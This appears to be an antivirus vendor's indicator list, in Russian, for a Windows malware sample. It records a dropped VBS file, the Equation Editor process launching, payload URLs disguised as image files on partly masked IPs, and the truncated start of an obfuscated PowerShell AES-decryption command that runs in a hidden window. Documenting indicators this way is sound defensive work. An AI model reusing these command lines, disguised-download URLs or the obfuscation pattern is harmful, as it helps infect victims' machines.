Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\myburnheisgreattothingsseeinggrea.vBS"
- %APPDATA%\myburnheisgreattothingsseeinggrea.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
- '17#.#33.177.4':80
- '19#.#6.176.133':80
- http://17#.#33.177.4/65/myburnheisgreattothingsseeinggreat.gIF
- http://19#.#6.176.133/Upload/vbs.jpeg
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esMana... (со скрытым окном)